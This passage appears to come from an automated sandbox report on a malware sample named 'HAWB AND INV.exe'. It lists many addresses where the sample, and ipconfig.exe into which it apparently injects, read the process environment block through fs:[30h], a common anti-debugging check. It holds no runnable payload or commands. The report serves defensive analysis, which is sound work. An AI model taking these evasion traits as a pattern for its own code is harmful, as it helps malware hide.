          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_012A070D mov eax, dword ptr fs:[00000030h] 10_2_012A070D
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_0120A70E mov eax, dword ptr fs:[00000030h] 10_2_0120A70E
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_0120A70E mov eax, dword ptr fs:[00000030h] 10_2_0120A70E
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_011D4F2E mov eax, dword ptr fs:[00000030h] 10_2_011D4F2E
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_011D4F2E mov eax, dword ptr fs:[00000030h] 10_2_011D4F2E
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_0126FF10 mov eax, dword ptr fs:[00000030h] 10_2_0126FF10
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_0126FF10 mov eax, dword ptr fs:[00000030h] 10_2_0126FF10
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_012A8F6A mov eax, dword ptr fs:[00000030h] 10_2_012A8F6A
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_011EEF40 mov eax, dword ptr fs:[00000030h] 10_2_011EEF40
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_011EFF60 mov eax, dword ptr fs:[00000030h] 10_2_011EFF60
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_011E8794 mov eax, dword ptr fs:[00000030h] 10_2_011E8794
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_01257794 mov eax, dword ptr fs:[00000030h] 10_2_01257794
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_01257794 mov eax, dword ptr fs:[00000030h] 10_2_01257794
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_01257794 mov eax, dword ptr fs:[00000030h] 10_2_01257794
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_012137F5 mov eax, dword ptr fs:[00000030h] 10_2_012137F5
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_0128FE3F mov eax, dword ptr fs:[00000030h] 10_2_0128FE3F
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_011DC600 mov eax, dword ptr fs:[00000030h] 10_2_011DC600
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_011DC600 mov eax, dword ptr fs:[00000030h] 10_2_011DC600
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_011DC600 mov eax, dword ptr fs:[00000030h] 10_2_011DC600
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_01208E00 mov eax, dword ptr fs:[00000030h] 10_2_01208E00
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_01291608 mov eax, dword ptr fs:[00000030h] 10_2_01291608
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_0120A61C mov eax, dword ptr fs:[00000030h] 10_2_0120A61C
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_0120A61C mov eax, dword ptr fs:[00000030h] 10_2_0120A61C
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_011DE620 mov eax, dword ptr fs:[00000030h] 10_2_011DE620
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_011E7E41 mov eax, dword ptr fs:[00000030h] 10_2_011E7E41
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_011E7E41 mov eax, dword ptr fs:[00000030h] 10_2_011E7E41
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_011E7E41 mov eax, dword ptr fs:[00000030h] 10_2_011E7E41
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_011E7E41 mov eax, dword ptr fs:[00000030h] 10_2_011E7E41
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_011E7E41 mov eax, dword ptr fs:[00000030h] 10_2_011E7E41
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_011E7E41 mov eax, dword ptr fs:[00000030h] 10_2_011E7E41
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_011FAE73 mov eax, dword ptr fs:[00000030h] 10_2_011FAE73
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_011FAE73 mov eax, dword ptr fs:[00000030h] 10_2_011FAE73
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_011FAE73 mov eax, dword ptr fs:[00000030h] 10_2_011FAE73
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_011FAE73 mov eax, dword ptr fs:[00000030h] 10_2_011FAE73
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_011FAE73 mov eax, dword ptr fs:[00000030h] 10_2_011FAE73
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_0129AE44 mov eax, dword ptr fs:[00000030h] 10_2_0129AE44
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_0129AE44 mov eax, dword ptr fs:[00000030h] 10_2_0129AE44
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_011E766D mov eax, dword ptr fs:[00000030h] 10_2_011E766D
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_012546A7 mov eax, dword ptr fs:[00000030h] 10_2_012546A7
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_012A0EA5 mov eax, dword ptr fs:[00000030h] 10_2_012A0EA5
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_012A0EA5 mov eax, dword ptr fs:[00000030h] 10_2_012A0EA5
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_012A0EA5 mov eax, dword ptr fs:[00000030h] 10_2_012A0EA5
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_0126FE87 mov eax, dword ptr fs:[00000030h] 10_2_0126FE87
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_012016E0 mov ecx, dword ptr fs:[00000030h] 10_2_012016E0
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_01218EC7 mov eax, dword ptr fs:[00000030h] 10_2_01218EC7
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_0128FEC0 mov eax, dword ptr fs:[00000030h] 10_2_0128FEC0
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_012036CC mov eax, dword ptr fs:[00000030h] 10_2_012036CC
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_012A8ED6 mov eax, dword ptr fs:[00000030h] 10_2_012A8ED6
          Source: C:\Users\user\Desktop\HAWB AND INV.exe Code function: 10_2_011E76E2 mov eax, dword ptr fs:[00000030h] 10_2_011E76E2
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B0FAB0 mov eax, dword ptr fs:[00000030h] 23_2_02B0FAB0
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02AD52A5 mov eax, dword ptr fs:[00000030h] 23_2_02AD52A5
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02AD52A5 mov eax, dword ptr fs:[00000030h] 23_2_02AD52A5
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02AD52A5 mov eax, dword ptr fs:[00000030h] 23_2_02AD52A5
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02AD52A5 mov eax, dword ptr fs:[00000030h] 23_2_02AD52A5
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02AD52A5 mov eax, dword ptr fs:[00000030h] 23_2_02AD52A5
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02AEAAB0 mov eax, dword ptr fs:[00000030h] 23_2_02AEAAB0
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02AEAAB0 mov eax, dword ptr fs:[00000030h] 23_2_02AEAAB0
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B0D294 mov eax, dword ptr fs:[00000030h] 23_2_02B0D294
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B0D294 mov eax, dword ptr fs:[00000030h] 23_2_02B0D294
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B02AE4 mov eax, dword ptr fs:[00000030h] 23_2_02B02AE4
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B02ACB mov eax, dword ptr fs:[00000030h] 23_2_02B02ACB
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B14A2C mov eax, dword ptr fs:[00000030h] 23_2_02B14A2C
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B14A2C mov eax, dword ptr fs:[00000030h] 23_2_02B14A2C
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02AE8A0A mov eax, dword ptr fs:[00000030h] 23_2_02AE8A0A
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B9AA16 mov eax, dword ptr fs:[00000030h] 23_2_02B9AA16
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B9AA16 mov eax, dword ptr fs:[00000030h] 23_2_02B9AA16
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02AF3A1C mov eax, dword ptr fs:[00000030h] 23_2_02AF3A1C
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02ADAA16 mov eax, dword ptr fs:[00000030h] 23_2_02ADAA16
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02ADAA16 mov eax, dword ptr fs:[00000030h] 23_2_02ADAA16
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02AD5210 mov eax, dword ptr fs:[00000030h] 23_2_02AD5210
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02AD5210 mov ecx, dword ptr fs:[00000030h] 23_2_02AD5210
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02AD5210 mov eax, dword ptr fs:[00000030h] 23_2_02AD5210
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02AD5210 mov eax, dword ptr fs:[00000030h] 23_2_02AD5210
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B1927A mov eax, dword ptr fs:[00000030h] 23_2_02B1927A
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B8B260 mov eax, dword ptr fs:[00000030h] 23_2_02B8B260
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B8B260 mov eax, dword ptr fs:[00000030h] 23_2_02B8B260
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02BA8A62 mov eax, dword ptr fs:[00000030h] 23_2_02BA8A62
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B64257 mov eax, dword ptr fs:[00000030h] 23_2_02B64257
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B9EA55 mov eax, dword ptr fs:[00000030h] 23_2_02B9EA55
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02AD9240 mov eax, dword ptr fs:[00000030h] 23_2_02AD9240
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02AD9240 mov eax, dword ptr fs:[00000030h] 23_2_02AD9240
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02AD9240 mov eax, dword ptr fs:[00000030h] 23_2_02AD9240
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02AD9240 mov eax, dword ptr fs:[00000030h] 23_2_02AD9240
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B04BAD mov eax, dword ptr fs:[00000030h] 23_2_02B04BAD
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B04BAD mov eax, dword ptr fs:[00000030h] 23_2_02B04BAD
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B04BAD mov eax, dword ptr fs:[00000030h] 23_2_02B04BAD
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02BA5BA5 mov eax, dword ptr fs:[00000030h] 23_2_02BA5BA5
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B0B390 mov eax, dword ptr fs:[00000030h] 23_2_02B0B390
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02AE1B8F mov eax, dword ptr fs:[00000030h] 23_2_02AE1B8F
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02AE1B8F mov eax, dword ptr fs:[00000030h] 23_2_02AE1B8F
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B02397 mov eax, dword ptr fs:[00000030h] 23_2_02B02397
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B9138A mov eax, dword ptr fs:[00000030h] 23_2_02B9138A
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B8D380 mov ecx, dword ptr fs:[00000030h] 23_2_02B8D380
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02AFDBE9 mov eax, dword ptr fs:[00000030h] 23_2_02AFDBE9
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B003E2 mov eax, dword ptr fs:[00000030h] 23_2_02B003E2
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B003E2 mov eax, dword ptr fs:[00000030h] 23_2_02B003E2
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B003E2 mov eax, dword ptr fs:[00000030h] 23_2_02B003E2
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B003E2 mov eax, dword ptr fs:[00000030h] 23_2_02B003E2
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B003E2 mov eax, dword ptr fs:[00000030h] 23_2_02B003E2
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B003E2 mov eax, dword ptr fs:[00000030h] 23_2_02B003E2
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B553CA mov eax, dword ptr fs:[00000030h] 23_2_02B553CA
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B553CA mov eax, dword ptr fs:[00000030h] 23_2_02B553CA
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B9131B mov eax, dword ptr fs:[00000030h] 23_2_02B9131B
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B03B7A mov eax, dword ptr fs:[00000030h] 23_2_02B03B7A
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B03B7A mov eax, dword ptr fs:[00000030h] 23_2_02B03B7A
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02ADDB60 mov ecx, dword ptr fs:[00000030h] 23_2_02ADDB60
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02BA8B58 mov eax, dword ptr fs:[00000030h] 23_2_02BA8B58
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02ADDB40 mov eax, dword ptr fs:[00000030h] 23_2_02ADDB40
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02ADF358 mov eax, dword ptr fs:[00000030h] 23_2_02ADF358
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B0F0BF mov ecx, dword ptr fs:[00000030h] 23_2_02B0F0BF
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B0F0BF mov eax, dword ptr fs:[00000030h] 23_2_02B0F0BF
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B0F0BF mov eax, dword ptr fs:[00000030h] 23_2_02B0F0BF
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B020A0 mov eax, dword ptr fs:[00000030h] 23_2_02B020A0
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B020A0 mov eax, dword ptr fs:[00000030h] 23_2_02B020A0
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B020A0 mov eax, dword ptr fs:[00000030h] 23_2_02B020A0
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B020A0 mov eax, dword ptr fs:[00000030h] 23_2_02B020A0
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B020A0 mov eax, dword ptr fs:[00000030h] 23_2_02B020A0
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B020A0 mov eax, dword ptr fs:[00000030h] 23_2_02B020A0
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B190AF mov eax, dword ptr fs:[00000030h] 23_2_02B190AF
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02AD9080 mov eax, dword ptr fs:[00000030h] 23_2_02AD9080
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B53884 mov eax, dword ptr fs:[00000030h] 23_2_02B53884
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B53884 mov eax, dword ptr fs:[00000030h] 23_2_02B53884
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02AD58EC mov eax, dword ptr fs:[00000030h] 23_2_02AD58EC
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B6B8D0 mov eax, dword ptr fs:[00000030h] 23_2_02B6B8D0
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B6B8D0 mov ecx, dword ptr fs:[00000030h] 23_2_02B6B8D0
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B6B8D0 mov eax, dword ptr fs:[00000030h] 23_2_02B6B8D0
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B6B8D0 mov eax, dword ptr fs:[00000030h] 23_2_02B6B8D0
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B6B8D0 mov eax, dword ptr fs:[00000030h] 23_2_02B6B8D0
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B6B8D0 mov eax, dword ptr fs:[00000030h] 23_2_02B6B8D0
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02AEB02A mov eax, dword ptr fs:[00000030h] 23_2_02AEB02A
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02AEB02A mov eax, dword ptr fs:[00000030h] 23_2_02AEB02A
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02AEB02A mov eax, dword ptr fs:[00000030h] 23_2_02AEB02A
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02AEB02A mov eax, dword ptr fs:[00000030h] 23_2_02AEB02A
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B0002D mov eax, dword ptr fs:[00000030h] 23_2_02B0002D
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B0002D mov eax, dword ptr fs:[00000030h] 23_2_02B0002D
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B0002D mov eax, dword ptr fs:[00000030h] 23_2_02B0002D
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B0002D mov eax, dword ptr fs:[00000030h] 23_2_02B0002D
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B0002D mov eax, dword ptr fs:[00000030h] 23_2_02B0002D
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B57016 mov eax, dword ptr fs:[00000030h] 23_2_02B57016
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B57016 mov eax, dword ptr fs:[00000030h] 23_2_02B57016
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B57016 mov eax, dword ptr fs:[00000030h] 23_2_02B57016
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02BA4015 mov eax, dword ptr fs:[00000030h] 23_2_02BA4015
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02BA4015 mov eax, dword ptr fs:[00000030h] 23_2_02BA4015
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B92073 mov eax, dword ptr fs:[00000030h] 23_2_02B92073
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02BA1074 mov eax, dword ptr fs:[00000030h] 23_2_02BA1074
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02AF0050 mov eax, dword ptr fs:[00000030h] 23_2_02AF0050
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02AF0050 mov eax, dword ptr fs:[00000030h] 23_2_02AF0050
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B551BE mov eax, dword ptr fs:[00000030h] 23_2_02B551BE
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B551BE mov eax, dword ptr fs:[00000030h] 23_2_02B551BE
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B551BE mov eax, dword ptr fs:[00000030h] 23_2_02B551BE
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B551BE mov eax, dword ptr fs:[00000030h] 23_2_02B551BE
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B061A0 mov eax, dword ptr fs:[00000030h] 23_2_02B061A0
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B061A0 mov eax, dword ptr fs:[00000030h] 23_2_02B061A0
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B569A6 mov eax, dword ptr fs:[00000030h] 23_2_02B569A6
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B02990 mov eax, dword ptr fs:[00000030h] 23_2_02B02990
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02AFC182 mov eax, dword ptr fs:[00000030h] 23_2_02AFC182
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B0A185 mov eax, dword ptr fs:[00000030h] 23_2_02B0A185
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02ADB1E1 mov eax, dword ptr fs:[00000030h] 23_2_02ADB1E1
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02ADB1E1 mov eax, dword ptr fs:[00000030h] 23_2_02ADB1E1
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02ADB1E1 mov eax, dword ptr fs:[00000030h] 23_2_02ADB1E1
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B641E8 mov eax, dword ptr fs:[00000030h] 23_2_02B641E8
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B0513A mov eax, dword ptr fs:[00000030h] 23_2_02B0513A
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B0513A mov eax, dword ptr fs:[00000030h] 23_2_02B0513A
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02AF4120 mov eax, dword ptr fs:[00000030h] 23_2_02AF4120
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02AF4120 mov eax, dword ptr fs:[00000030h] 23_2_02AF4120
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02AF4120 mov eax, dword ptr fs:[00000030h] 23_2_02AF4120
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02AF4120 mov eax, dword ptr fs:[00000030h] 23_2_02AF4120
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02AF4120 mov ecx, dword ptr fs:[00000030h] 23_2_02AF4120
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02AD9100 mov eax, dword ptr fs:[00000030h] 23_2_02AD9100
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02AD9100 mov eax, dword ptr fs:[00000030h] 23_2_02AD9100
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02AD9100 mov eax, dword ptr fs:[00000030h] 23_2_02AD9100
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02ADC962 mov eax, dword ptr fs:[00000030h] 23_2_02ADC962
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02ADB171 mov eax, dword ptr fs:[00000030h] 23_2_02ADB171
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02ADB171 mov eax, dword ptr fs:[00000030h] 23_2_02ADB171
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02AFB944 mov eax, dword ptr fs:[00000030h] 23_2_02AFB944
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02AFB944 mov eax, dword ptr fs:[00000030h] 23_2_02AFB944
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B546A7 mov eax, dword ptr fs:[00000030h] 23_2_02B546A7
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02BA0EA5 mov eax, dword ptr fs:[00000030h] 23_2_02BA0EA5
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02BA0EA5 mov eax, dword ptr fs:[00000030h] 23_2_02BA0EA5
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02BA0EA5 mov eax, dword ptr fs:[00000030h] 23_2_02BA0EA5
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B6FE87 mov eax, dword ptr fs:[00000030h] 23_2_02B6FE87
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02AE76E2 mov eax, dword ptr fs:[00000030h] 23_2_02AE76E2
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B016E0 mov ecx, dword ptr fs:[00000030h] 23_2_02B016E0
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02BA8ED6 mov eax, dword ptr fs:[00000030h] 23_2_02BA8ED6
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B18EC7 mov eax, dword ptr fs:[00000030h] 23_2_02B18EC7
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B8FEC0 mov eax, dword ptr fs:[00000030h] 23_2_02B8FEC0
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B036CC mov eax, dword ptr fs:[00000030h] 23_2_02B036CC
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B8FE3F mov eax, dword ptr fs:[00000030h] 23_2_02B8FE3F
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02ADE620 mov eax, dword ptr fs:[00000030h] 23_2_02ADE620
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B0A61C mov eax, dword ptr fs:[00000030h] 23_2_02B0A61C
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B0A61C mov eax, dword ptr fs:[00000030h] 23_2_02B0A61C
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02ADC600 mov eax, dword ptr fs:[00000030h] 23_2_02ADC600
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02ADC600 mov eax, dword ptr fs:[00000030h] 23_2_02ADC600
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02ADC600 mov eax, dword ptr fs:[00000030h] 23_2_02ADC600
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B08E00 mov eax, dword ptr fs:[00000030h] 23_2_02B08E00
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02B91608 mov eax, dword ptr fs:[00000030h] 23_2_02B91608
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02AE766D mov eax, dword ptr fs:[00000030h] 23_2_02AE766D
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02AFAE73 mov eax, dword ptr fs:[00000030h] 23_2_02AFAE73
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02AFAE73 mov eax, dword ptr fs:[00000030h] 23_2_02AFAE73
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02AFAE73 mov eax, dword ptr fs:[00000030h] 23_2_02AFAE73
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02AFAE73 mov eax, dword ptr fs:[00000030h] 23_2_02AFAE73
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02AFAE73 mov eax, dword ptr fs:[00000030h] 23_2_02AFAE73
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02AE7E41 mov eax, dword ptr fs:[00000030h] 23_2_02AE7E41
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02AE7E41 mov eax, dword ptr fs:[00000030h] 23_2_02AE7E41
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02AE7E41 mov eax, dword ptr fs:[00000030h] 23_2_02AE7E41
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02AE7E41 mov eax, dword ptr fs:[00000030h] 23_2_02AE7E41
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02AE7E41 mov eax, dword ptr fs:[00000030h] 23_2_02AE7E41
          Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 23_2_02AE7E41 mov eax, dword ptr fs:[00000030h] 23_2_02AE7E41
